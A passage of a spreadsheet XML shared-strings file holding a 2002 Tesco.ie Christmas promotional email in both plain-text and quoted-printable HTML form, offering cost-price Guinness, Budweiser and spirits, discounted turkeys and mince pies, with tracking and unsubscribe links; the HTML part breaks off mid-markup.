  </si>
  <si>
    <t xml:space="preserve">Subject: Cost price Guinness, Budweiser and selected spirits at tesco.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_Part_2067_1947928.1038245405702
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit
 Content-Description: This is text version of an eMessage
 Dear Mr Mason,
 With Christmas just round the corner, here's some offers worth
 celebrating. If you want to start stocking up on beer and spirits for
 the festive season, then we want to make it better value for money for
 you. Plus we've some great offers on frozen turkeys and mince pies.
 Cost Price Guinness and Budweiser
 ---------------------------------------------------------------
 Budweiser 500ml can x 24
 Now 42.14 Euro Save 5.62 Euro
 Guinness Draught 500ml can x 24
 Now 42.32 Euro Save 5.44 Euro
 Offers available until 04/12/02, while stocks last*
 http://www.tesco.ie/Register/
 Cost Price Selected Spirits
 ---------------------------------------------------------------
 Jameson Whiskey 1ltr and 70cl
 Cork Dry Gin 1ltr and 70cl
 Smirnoff Red Label Vodka 1ltr and 70cl
 Hennessy Cognac 1ltr and 70cl
 Baileys Original Irish Cream 1ltr and 70cl
 Bacardi White Rum 1ltr and 70cl
 Offers available until 04/12/02, while stocks last*
 http://www.tesco.ie/Register/
 50% Off Frozen Turkeys
 ---------------------------------------------------------------
 This great offer is available on Tesco's Frozen Turkey range from 3.5kg
 to 9.5kg in weight
 Offers available until 01/12/02, while stocks last
 http://www.tesco.ie/Register/
 20% Off Mince Pies
 ---------------------------------------------------------------
 Sweetie Pies! Take advantage of this tempting offer 
 Offers available until 01/12/02, while stocks last
 http://www.tesco.ie/Register/
 Tesco.ie Christmas Zone
 ---------------------------------------------------------------
 Visit our Christmas zone online at www.tesco.ie http://www.tesco.ie 
 Here you will be able to shop for Christmas with ease. Each week we'll
 highlight a special recipe and offer you some great tips for Christmas. 
 http://www.tesco.ie/Register/
 And Remember!
 ---------------------------------------------------------------
 Don't leave everything until the last minute, start buying your
 Christmas cakes, puddings, chocolates and biscuits now whilst we've
 still got a full range of stock in store. Browse now for everything
 you'll need for the festive season.http://www.tesco.ie/Register/
 Forward this email to a friend so they also can take advantage of these
 great offers too!
 http://www.twelvehorses.com/en_US/wrapper/forward.jhtml 
 At Tesco we've got Christmas covered.
 Tesco.ie
 ---------------------------------------------------------------
 All products are subject to availability while stocks last
 * Customer quotas apply. Maximum purchase of one case each of spirits
 per customer. Maximum purchase of six beer cases per customer.
 Online prices may vary from those charged in-store. Reduction will be
 made at the bottom of your till reciept.
 Prices in this email are correct at the time of production and are
 subject to change. Please see website for latest prices.
 If you would prefer not to receive emails with news and special offers
 from Tesco.ie, please click here: Unsubscribe
 http://www.tesco.ie/register/unsubscribe.asp?from=jm@jmason.org .
 It may take up to five working days to unsubscribe.
 ========================================================================
 ----------------------------- MESSAGE LINKS ----------------------------
 ========================================================================
 To view this message in HTML format (pictures as well as text), follow this link or alternatively copy and paste the link into your browser: 
 &lt;http://www.twelvehorses.com/S/G35YU/DW3YV/DVRK6/5ERAYIU1/M/&gt;
 To unsubscribe from this service, follow this link or alternatively copy and paste the link into your browser:
 &lt;http://www.twelvehorses.com/S/G35YU/DW3YV/DVRK6/5ERAYIU1/U/&gt;
 ========================================================================
 ------=_Part_2067_1947928.1038245405702
 Content-Type: text/html; charset=ISO-8859-1
 Content-Transfer-Encoding: quoted-printable
 Content-Description: This is a full eMessage
 &lt;!--
 You have just received an HTML-rich eMessage that cannot be displayed by yo=
 ur email software. You may view this message online with your internet brow=
 ser by following this link:
 http://www.twelvehorses.com/S/G35YU/DW3YV/DVRK6/5ERAYIU1/M/
 Alternatively, you may copy and paste this link into your internet browser.
 --&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Cost price Guinness, Budweiser and selected spirits at tesco.i=
 e&lt;/TITLE&gt;&lt;/HEAD&gt;
 &lt;BODY BGCOLOR=3D"#ffffff" TEXT=3D"#000000" LINK=3D"#000000" VLINK=3D"#00000=
 0" ALINK=3D"#000000"&gt;
 &lt;TABLE ID=3D"maincell" WIDTH=3D507 BORDER=3D0 CELLSPACING=3D0 CELLPADDING=
 =3D0&gt;
 &lt;TR WIDTH=3D507 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D"You have just receiv=
 ed an HTML-rich eMessage that cannot be displayed by your email software. Y=
 ou may view this message online with your internet browser by following thi=
 s link:http://www.twelvehorses.com/S/G35YU/DW3YV/DVRK6/5ERAYIU1/M/" HEIGHT=
 =3D1 WIDTH=3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D507 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D507 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D507 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D507 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR WIDTH=3D507 HEIGHT=3D1&gt;&lt;TD COLSPAN=3D1&gt;&lt;IMG ALT=3D" " HEIGHT=3D1 WIDTH=
 =3D1 BORDER=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR ID=3D"middlerow" WIDTH=3D507&gt;&lt;TD ID=3D"textcell" ALIGN=3DLEFT VALIGN=3D=
 TOP WIDTH=3D507 HEIGHT=3D0 BGCOLOR=3D"#ffffff"&gt;&lt;TABLE ID=3D"netscapespacer"=
  WIDTH=3D507 HEIGHT=3D0 CELLSPACING=3D0 CELLPADDING=3D5 BORDER=3D0&gt;&lt;TR&gt;&lt;TD =
 WIDTH=3D507 HEIGHT=3D0 ALIGN=3DLEFT VALIGN=3DTOP&gt;&lt;FONT COLOR=3D"#000000" FA=
 CE=3D"Arial,Helvetica,sans-serif" SIZE=3D2&gt;&lt;P style=3D"margin: 0px 0px 0px =
 0px"&gt;&lt;tr&gt;&lt;table width=3D"600" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "5" bgcolor=3D"#9CCFFF"&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"596" border=3D"0" cellspaci=
 ng=3D"0" cellpadding=3D"0" bgcolor=3D"#FFFFFF"&gt;&lt;tr&gt;&lt;td&gt;&lt;img border=3D"0" sr=
 c=3D"http://www.12hs.com/images/tesco/10/top.gif" usemap=3D"#top"&gt;&lt;MAP NAME=
 =3D"top"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,147,45" HREF=3D"http://www.twel=
 vehorses.com/mm/Clickthrough/23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYu=
 LuACBQH4A/*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3DTescoI*ht=
 tp://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3DTescoI"&gt;&lt;AREA SHAPE=3D=
 "RECT" COORDS=3D"479,52,591,77" HREF=3D"http://www.twelvehorses.com/mm/Clic=
 kthrough/23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://ww=
 w.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dwww*http://www.twelvehorses.c=
 om/wrapper/doc_view.jhtml?d=3Dwww"&gt;&lt;/MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"=
 100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"8"&gt;&lt;tr&gt;&lt;td&gt;&lt;font size=
 =3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0p=
 x 0px 0px"&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;Dear Mr Mason,&lt;/FONT&gt;&lt;=
 /P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;P style=3D"margin: 0px 0=
 px 0px 0px"&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;With Christmas just r=
 ound the corner, here's some offers worth celebrating. If you want to start=
  stocking up on beer and spirits for the festive season, then we want to ma=
 ke it better value for money for you. Plus we've some great offers on froze=
 n turkeys and mince pies.&lt;/FONT&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td =
 align=3D"center" height=3D"40"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco=
 /10/pre_budget_specials.gif" width=3D"550" height=3D"30"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;=
 &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;=
 &lt;td width=3D"281"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/10/cost_pric=
 e_guinness_and_budweiser.gif" width=3D"281" height=3D"20"&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/=
 td&gt;&lt;td width=3D"281"&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/10/cost_p=
 rice_selected_spirits.gif" width=3D"281" height=3D"20"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td wi=
 dth=3D"281" valign=3D"top"&gt;&lt;table width=3D"281" border=3D"0" cellspacing=3D=
 "0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td height=3D"150"&gt;&lt;img border=3D"0" src=3D"http:=
 //www.12hs.com/images/tesco/10/guiness_bud.jpg" usemap=3D"#guiness_bud"&gt;&lt;MA=
 P NAME=3D"guiness_bud"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,281,150" HREF=3D"=
 http://www.twelvehorses.com/mm/Clickthrough/23317062/27021558/23333143/uBn6=
 _sdjVJ8Dmr08mYuLuACBQH4A/*http://www.twelvehorses.com/wrapper/doc_view.jhtm=
 l?d=3Dguiness_bud*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dgu=
 iness_bud"&gt;&lt;/MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"281" border=3D"0" cellsp=
 acing=3D"0" cellpadding=3D"8"&gt;&lt;tr valign=3D"top"&gt;&lt;td height=3D"114"&gt;&lt;font s=
 ize=3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px=
  0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"marg=
 in: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;FONT FACE=3D=
 "Arial,Helvetica,sans-serif"&gt;Budweiser 500ml can x 24&lt;/FONT&gt;&lt;/P&gt;&lt;P style=3D=
 "margin: 0px 0px 0px 0px"&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;&lt;B&gt;Now =
 &lt;/B&gt;&lt;/FONT&gt;=80&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;&lt;B&gt;42.14&lt;/B&gt;&lt;/FONT&gt;=
 &lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt; Save &lt;/FONT&gt;=80&lt;FONT FACE=3D"Ari=
 al,Helvetica,sans-serif"&gt;5.62&lt;/FONT&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px=
 "&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;Guinness Draught 500ml can x 24=
 &lt;/FONT&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;FONT FACE=3D"Arial,Helveti=
 ca,sans-serif"&gt;&lt;B&gt;Now &lt;/B&gt;&lt;/FONT&gt;=80&lt;FONT FACE=3D"Arial,Helvetica,sans-seri=
 f"&gt;&lt;B&gt;42.32&lt;/B&gt;&lt;/FONT&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt; Save &lt;/FON=
 T&gt;=80&lt;FONT FACE=3D"Arial,Helvetica,sans-serif"&gt;5.44&lt;/FONT&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;=
 &lt;tr valign=3D"top"&gt;&lt;td&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0"=
  cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font size=3D"1" face=3D"Arial, Helvetica, sans-=
 serif" color=3D"#333399"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Offers av=
 ailable until 04/12/02, &lt;br&gt;while stocks last* &lt;/font&gt;&lt;/td&gt;&lt;td align=3D"rig=
 ht"&gt;&lt;img border=3D"0" src=3D"http://www.12hs.com/images/tesco/10/clickhere.=
 gif" usemap=3D"#guiness_bud2"&gt;&lt;MAP NAME=3D"guiness_bud2"&gt;&lt;AREA SHAPE=3D"REC=
 T" COORDS=3D"0,0,57,14" HREF=3D"http://www.twelvehorses.com/mm/Clickthrough=
 /23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://www.twelve=
 horses.com/wrapper/doc_view.jhtml?d=3Dguiness_bud*http://www.twelvehorses.c=
 om/wrapper/doc_view.jhtml?d=3Dguiness_bud"&gt;&lt;/MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/t=
 r&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D"281" valign=3D=
 "top"&gt;&lt;table width=3D"281" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"=
 &gt;&lt;tr&gt;&lt;td height=3D"150" align=3D"center"&gt;&lt;img border=3D"0" src=3D"http://ww=
 w.12hs.com/images/tesco/10/spirits.jpg" usemap=3D"#spirits"&gt;&lt;MAP NAME=3D"sp=
 irits"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,281,150" HREF=3D"http://www.twelv=
 ehorses.com/mm/Clickthrough/23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuL=
 uACBQH4A/*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dspirits*ht=
 tp://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dspirits"&gt;&lt;/MAP&gt;&lt;/td&gt;&lt;/=
 tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"281" border=3D"0" cellspacing=3D"0" cellpadding=
 =3D"8"&gt;&lt;tr valign=3D"top"&gt;&lt;td height=3D"114"&gt;&lt;font size=3D"2" face=3D"Arial=
 , Helvetica, sans-serif"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P st=
 yle=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/=
 P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Jameson Whiskey 1ltr and 70cl&lt;/P&gt;&lt;P =
 style=3D"margin: 0px 0px 0px 0px"&gt;Cork Dry Gin 1ltr and 70cl&lt;/P&gt;&lt;P style=3D=
 "margin: 0px 0px 0px 0px"&gt;Smirnoff Red Label Vodka 1ltr and 70cl&lt;/P&gt;&lt;P styl=
 e=3D"margin: 0px 0px 0px 0px"&gt;Hennessy Cognac 1ltr and 70cl&lt;/P&gt;&lt;P style=3D"=
 margin: 0px 0px 0px 0px"&gt;Baileys Original Irish Cream 1ltr and 70cl&lt;/P&gt;&lt;P s=
 tyle=3D"margin: 0px 0px 0px 0px"&gt;Bacardi White Rum 1ltr and 70cl&lt;/font&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;tr valign=3D"top"&gt;&lt;td&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=
 =3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font size=3D"1" face=3D"Arial, Helvetica,=
  sans-serif" color=3D"#333399"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Off=
 ers available until 04/12/02, &lt;br&gt;while stocks last* &lt;/font&gt;&lt;/td&gt;&lt;td align=
 =3D"right"&gt;&lt;img border=3D"0" src=3D"http://www.12hs.com/images/tesco/10/cli=
 ckhere.gif" usemap=3D"#spirits2"&gt;&lt;MAP NAME=3D"spirits2"&gt;&lt;AREA SHAPE=3D"RECT=
 " COORDS=3D"0,0,57,14" HREF=3D"http://www.twelvehorses.com/mm/Clickthrough/=
 23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://www.twelveh=
 orses.com/wrapper/doc_view.jhtml?d=3Dspirits*http://www.twelvehorses.com/wr=
 apper/doc_view.jhtml?d=3Dspirits"&gt;&lt;/MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table=
 &gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"100%=
 " border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td width=3D"281"&gt;&lt;i=
 mg src=3D"http://www.12hs.com/images/tesco/10/50_off_frozen_turkeys.gif" wi=
 dth=3D"281" height=3D"20"&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D"281"&gt;&lt;img src=3D=
 "http://www.12hs.com/images/tesco/10/20_off_mince_pies.gif" width=3D"281" h=
 eight=3D"20"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D"281" valign=3D"top"&gt;&lt;table width=3D=
 "281" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td height=3D"15=
 0" align=3D"center"&gt;&lt;img border=3D"0" src=3D"http://www.12hs.com/images/tes=
 co/10/roast_turkey.jpg" usemap=3D"#roast_turkey"&gt;&lt;MAP NAME=3D"roast_turkey"=
 &gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,137,150" HREF=3D"http://www.twelvehorse=
 s.com/mm/Clickthrough/23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH=
 4A/*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Droast_turkey*htt=
 p://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Droast_turkey"&gt;&lt;/MAP&gt;&lt;/t=
 d&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"281" border=3D"0" cellspacing=3D"0" cellpadd=
 ing=3D"8"&gt;&lt;tr valign=3D"top"&gt;&lt;td&gt;&lt;font size=3D"2" face=3D"Arial, Helvetica,=
  sans-serif"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margi=
 n: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=
 =3D"margin: 0px 0px 0px 0px"&gt;This great offer is available on Tesco's Froze=
 n Turkey range from 3.5kg to 9.5kg in weight&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=3D"=
 top"&gt;&lt;td&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=
 =3D"0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font size=3D"1" face=3D"Arial, Helvetica, sans-serif" color=
 =3D"#333399"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Offers available unti=
 l 01/12/02, &lt;br&gt;while stocks last &lt;/font&gt;&lt;/td&gt;&lt;td align=3D"right"&gt;&lt;img bord=
 er=3D"0" src=3D"http://www.12hs.com/images/tesco/10/clickhere.gif" usemap=
 =3D"#roast_turkey2"&gt;&lt;MAP NAME=3D"roast_turkey2"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=
 =3D"0,0,57,14" HREF=3D"http://www.twelvehorses.com/mm/Clickthrough/23317062=
 /27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://www.twelvehorses.co=
 m/wrapper/doc_view.jhtml?d=3Droast_turkey*http://www.twelvehorses.com/wrapp=
 er/doc_view.jhtml?d=3Droast_turkey"&gt;&lt;/MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tab=
 le&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D"281" valign=3D"top"&gt;&lt;=
 table width=3D"281" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;t=
 d height=3D"150"&gt;&lt;img border=3D"0" src=3D"http://www.12hs.com/images/tesco/=
 10/deep_mince_pie.jpg" usemap=3D"#deep_mince_pie"&gt;&lt;MAP NAME=3D"deep_mince_p=
 ie"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,281,150" HREF=3D"http://www.twelveho=
 rses.com/mm/Clickthrough/23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuAC=
 BQH4A/*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Ddeep_mince_pi=
 e*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Ddeep_mince_pie"&gt;&lt;/=
 MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"281" border=3D"0" cellspacing=3D"0" c=
 ellpadding=3D"8"&gt;&lt;tr valign=3D"top"&gt;&lt;td&gt;&lt;font size=3D"2" face=3D"Arial, Hel=
 vetica, sans-serif"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=
 =3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;=
 P style=3D"margin: 0px 0px 0px 0px"&gt;Sweetie Pies! Take advantage of this te=
 mpting offer &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=3D"top"&gt;&lt;td&gt;&lt;table width=3D"100%" =
 border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font size=3D"1" f=
 ace=3D"Arial, Helvetica, sans-serif" color=3D"#333399"&gt;&lt;/P&gt;&lt;P style=3D"marg=
 in: 0px 0px 0px 0px"&gt;Offers available until 01/12/02, &lt;br&gt;while stocks last=
  &lt;/font&gt;&lt;/td&gt;&lt;td align=3D"right"&gt;&lt;img border=3D"0" src=3D"http://www.12hs.c=
 om/images/tesco/10/clickhere.gif" usemap=3D"#deep_mince_pie2"&gt;&lt;MAP NAME=3D"=
 deep_mince_pie2"&gt;&lt;AREA SHAPE=3D"RECT" COORDS=3D"0,0,57,14" HREF=3D"http://w=
 ww.twelvehorses.com/mm/Clickthrough/23317062/27021558/23333143/uBn6_sdjVJ8D=
 mr08mYuLuACBQH4A/*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dde=
 ep_mince_pie*http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Ddeep_mi=
 nce_pie"&gt;&lt;/MAP&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;=
 /tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td align=3D"center" height=3D"40"&gt;&lt;img src=3D"ht=
 tp://www.12hs.com/images/tesco/10/save_time_shop_online_this_christmas.gif"=
  width=3D"550" height=3D"30"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"100%" border=
 =3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td width=3D"281"&gt;&lt;img src=
 =3D"http://www.12hs.com/images/tesco/10/christmas_zone.gif" width=3D"281" h=
 eight=3D"20"&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=3D"281"&gt;&lt;img src=3D"http://www.1=
 2hs.com/images/tesco/10/and_remember.gif" width=3D"281" height=3D"20"&gt;&lt;/td&gt;=
 &lt;/tr&gt;&lt;tr&gt;&lt;td width=3D"281" valign=3D"top"&gt;&lt;table width=3D"281" border=3D"0"=
  cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"281" border=3D=
 "0" cellspacing=3D"0" cellpadding=3D"8"&gt;&lt;tr&gt;&lt;td height=3D"100"&gt;&lt;font size=
 =3D"2" face=3D"Arial, Helvetica, sans-serif"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0p=
 x 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin:=
  0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Visit our Christ=
 mas zone online at &lt;A HREF=3D"http://www.twelvehorses.com/mm/Clickthrough/2=
 3317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*http://www.tesco.ie=
 *http://www.tesco.ie" TARGET=3D"_blank"&gt;&lt;FONT FACE=3D"Arial,Helvetica,sans-=
 serif"&gt;www.tesco.ie&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Here=
  you will be able to shop for Christmas with ease. Each week we'll highligh=
 t a special recipe and offer you some great tips for Christmas. &lt;/font&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadd=
 ing=3D"0"&gt;&lt;tr&gt;&lt;td&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/10/spacer.gi=
 f" width=3D"2" height=3D"2"&gt;&lt;/td&gt;&lt;td align=3D"right"&gt;&lt;/P&gt;&lt;P style=3D"margin=
 : 0px 0px 0px 0px"&gt;&lt;img border=3D"0" src=3D"http://www.12hs.com/images/tesc=
 o/10/clickhere.gif" usemap=3D"#christmaszone"&gt;&lt;MAP NAME=3D"christmaszone"&gt;&lt;=
 AREA SHAPE=3D"RECT" COORDS=3D"0,0,57,14" HREF=3D"http://www.twelvehorses.co=
 m/mm/Clickthrough/23317062/27021558/23333143/uBn6_sdjVJ8Dmr08mYuLuACBQH4A/*=
 http://www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dchristmaszone*http:/=
 /www.twelvehorses.com/wrapper/doc_view.jhtml?d=3Dchristmaszone"&gt;&lt;/MAP&gt;&lt;/td&gt;=
 &lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td wi=
 dth=3D"281" valign=3D"top"&gt;&lt;table width=3D"281" border=3D"0" cellspacing=3D=
 "0" cellpadding=3D"0"&gt;&lt;tr&gt;&lt;td&gt;&lt;table width=3D"281" border=3D"0" cellspacing=
 =3D"0" cellpadding=3D"8"&gt;&lt;tr&gt;&lt;td height=3D"100"&gt;&lt;font size=3D"2" face=3D"Ar=
 ial, Helvetica, sans-serif"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P=
  style=3D"margin: 0px 0px 0px 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"=
 &gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;Don't leave everything until the =
 last minute, start buying your Christmas cakes, puddings, chocolates and bi=
 scuits now whilst we've still got a full range of stock in store. Browse no=
 w for everything you'll need for the festive season.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;t=
 d&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"0"&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;img src=3D"http://www.12hs.com/images/tesco/10/spacer.gif" width=3D"=
 2" height=3D"2"&gt;&lt;/td&gt;&lt;td align=3D"right"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0p=
 x 0px"&gt;&lt;/P&gt;&lt;P style=3D"margin: 0px 0px 0px 0px"&gt;&lt;img border=3D"0" src=3D"ht=
 tp://www.12hs.com/images/tesco/10/clickhere.gif" usemap=3D"#remember"&gt;&lt;MAP =
